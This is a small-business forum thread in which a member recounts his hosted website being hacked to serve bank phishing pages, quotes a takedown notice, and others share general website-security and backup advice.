4pm yesterday, all our email accounts simply stopped working. Then I discovered our website had been suspended! The 24hrs following have been horrid!

Website had been hacked by someone placing a file java.php into the Public folder. The code produced a login page for an Italian bank and passed details of anyone attempting to login to the attacker!

The upshot is that it trashed the website by creating 1,000's of emails.

And I thought it was secure!!!

John

Jeez John - hopefully they never got any of the customers 'private' details (i.e credit/debt card details etc).

Not had much luck lately mate have you - what with the DTG problems and now this ................. I won't say it comes in threes!

Well, it's perhaps what I needed to get rid of a crap website - it's trashed now. It didn't work anyway and had no sales through it so no chance of anyone's details going elsewhere!

DTG is up and running now - my BIG problem is time, just not enough of it.

John

Hi John, good to hear the DTG is up and running again - i've got plenty of spare time so if you fancy you can install your machine at my premises FOC :wink:

Blimey John, sorry to hear about your bad luck, were the hosting company good when it happened ??

JustHost have been brilliant - nearly immediate help.

thats good to hear, its only when the sh*t hits the fan that you tend to know if the hosting company are any good - and you are never in the mood for hold music or "eloo mister i may help you i am sam from engerland"

Do you know how they put this php file into your webspace? It might be helpful to others to know if it was an insecure script or something that gave them access to your space.

@JSR
As I had my site designed by a 3rd party, I can only guess that it's security wasn't great! I had a problem a year ago and got someone from the OSCommerce forums who specialised in securing sites, to sort it out and 'lock the site down' - his words not mine. I paid him to do it.

So your guess is as good as mine!

The way it works from what I understand is:
1. A bogus email is sent purporting to come from the recipient's bank.
2. The email informs them of a security breach on their account and asks them to login to rectify it - a link is provided.
3. They click the link and it takes them to a fake bank login page. This page, in my case java.php, had been placed on my hosting service!
4. They type in their login details on the java.php page and the login details are sent to the attacker.

That's about it - a very common occurence I'm told.

Anyway, my whole site, coding and everything has now been removed.

John

@JSR
As I had my site designed by a 3rd party, I can only guess that it's security wasn't great! I had a problem a year ago and got someone from the OSCommerce forums who specialised in securing sites, to sort it out and 'lock the site down' - his words not mine. I paid him to do it.

So your guess is as good as mine!

The way it works from what I understand is:
1. A bogus email is sent purporting to come from the recipient's bank.
2. The email informs them of a security breach on their account and asks them to login to rectify it - a link is provided.
3. They click the link and it takes them to a fake bank login page. This page, in my case java.php, had been placed on my hosting service!
4. They type in their login details on the java.php page and the login details are sent to the attacker.

That's about it - a very common occurence I'm told.

Anyway, my whole site, coding and everything has now been removed.

John
It's a pity you can't find out how the file got on there in the first place, so that you can be wary of it in the future.

It's quite possible that your website was "locked down". It's typical to have many websites run on the same server or virtual server. If the server isn't sufficiently secure, one website can affect another - so it could have been an insecure script on someone else's website (or even a malicious user who's purposefully uploading dodgy scripts to their own website).

So I wouldn't immediately blame the OScommerce forum guy - who, I'm sure, secured the oscommerce scripts as much as he was able. Without knowing how the file got there, it's difficult to know how to prevent it in the future. It's particularly scary to be told that it's a "very common occurrence" without knowing how it happened.

My priority was to re-establish my email accounts, I wasn't overly bothered about my website as I'd grown to dislike it!

I doubt a day goes by when I don't receive a 'phishing' email, usually purporting to be a bank. This, the exact same content as I described above and often from a bank with whom I've never had an account! I can fully understand how some get caught.

I appreciate your priorities. I think we all get phishing emails. I just wondered how they got the file onto your webspace in the first place. I guess it's just one of those things.

..... and they've done it again!!!

I just had a call from:

Dear Web Site Administrator

The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com (http://www.fraudwatchinternational.com/)) has received a report of a fraudulent financial web page (illegal phishing content) hosted on a website you administer.

URL: http://www.stitch-up.biz/cimbclicks.com/cimbclicks.htm
Additional URL's:
http://www.stitch-up.biz/cimbclicks.com/servlet.php
http://www.stitch-up.biz/cimbclicks.com/processing.php
http://www.stitch-up.biz/cimbclicks.com/data.php
http://www.stitch-up.biz/cimbclicks.com/validate.php
http://www.stitch-up.biz/cimbclicks.com/database.php
http://www.stitch-up.biz/cimbclicks.com/complete.htm
http://www.stitch-up.biz/cimbclicks.com/currentHighlights.htm
Brand Phished: CIMB Bank
IP Address: 69.175.7.250

*************************

On behalf of our client, we would greatly appreciate your assistance in:

a) Urgently Cleaning, closing or disallowing access to the site listed above as appropriate.

b) obtaining and providing to us additional information regarding this incident, for example relevant logs or file from the host,


I went to my site and sure enough, they'd planted a false site!!

I've now password protected the access to the folder.

Unfortunately such hacking of websites is quite common.

The problem often lies in using open source software or free 3rd party scripts being used on your website. Hackers know the entry points to such software and then just use Google to search for sites running such software. Then they test to see if the entry point is open. If it is they enter and do their stuff.

Another method that hackers use is to put malware on to a person's PC. They then scan the PC for any website ftp usernames and passwords. Once they have those your site becomes theirs.

Here are some things you can do to help stop hacking:

Have two pcs, one is used to surf the internet and answer emails. The second pc is used to upload files to your website and download website orders and general admin duties. The second machine should never be exposed to malware. Both machines should have anti virus software.
Try and avoid open source products. If you must use open source products ensure you keep the software up to date and subscribe to any update feed. Plus follow any security advice in the forums associated with the software.
Use non dictionary usernames and passwords for logins.
Take a daily look at your website logs - any sudden increase in traffic should be immediately investigated.
Change your passwords regularly.

These are just a few suggestions.

Oh yes, never store credit card numbers on your website.

Andrew

crickey i thought it had happened again, then seen Andrew has pulled up an old post phew is all i can say

Andrew it might have been worth making this into a new post about website security, as i think more people will read it, maybe admin can repost your post as a new topic

Andrew it might have been worth making this into a new post about website security, as i think more people will read it, maybe admin can repost your post as a new topic

Not sure why you would think that Laura as Andrew's post is related to the subject?

yes it is, but if they read the ist page ist, then they might see the date and then not read to the end, i just thought as we were getting top tips together for each section, then these are top tips for website safety - somthing which we have nothing on at the moment

We got caught with one of our sites and as Andrew states above it's when websites are based on open source software where the website templates exist and are modified to suit your needs. The hackers spend time finding a way in which is often the same for many and then upload their files for whatever means they desire. It's all about securing your site with password protection at the required levels. They uploaded backlinks on ours so not as bad as what happened to John.

The problem often lies in using open source software ... Try and avoid open source products.
I don't know how anyone can avoid using open source products these days. If you run Apache httpd, you're using open source products. If you use PHP, you're using open source products. If you're using Linux, you're using open source products. How does anyone avoid using open source products these days?

I don't know how anyone can avoid using open source products these days.
Your right John, it is very difficult to avoid such open source products when creating websites. Even non-open source software could still have weak points.

Just like your house, if somebody wants to break in they will, you just have to make it harder for them - that is why houses have locks to doors and windows. If all of the known weak points in a website are protected, then it will be harder for the hacker to try and get in.

Andrew
One thing though, all website owners should work on the basis that one day they will be hacked. So you should make daily backups of all databases and store them away from your website. All files and images for your website should be backed up away from your website.

This way if you do get hacked then the files are readily available to reinstate the website quickly.

Very true. The internet is a public place and as soon as you put anything "out there", there will be someone trying to hack it.

One of the common issues I've read about over the last year or two is when a website is hacked due to another website hosted on the same server. You can secure yours as much as you like, but if the server isn't protected well enough then a hack into someone else's website can affect everyone else's website that's hosted on the same server.

With more and more hosts cramming more and more sites onto the same server at lower and lower prices, it's only to be expected that these things could happen. A hacker could easily buy a hosting package on the same server as your website for the sole purpose of uploading scripts that can affect everyone else's website on the same server.

It's also important to ensure that whichever host you go with keeps their software updated. It's not good the host using an old version of PHP just because the new one might prevent a thousand websites on that server from working properly. That's not your problem, it's there's. You need to be able to keep everything up-to-date.

Going cheap isn't always prudent.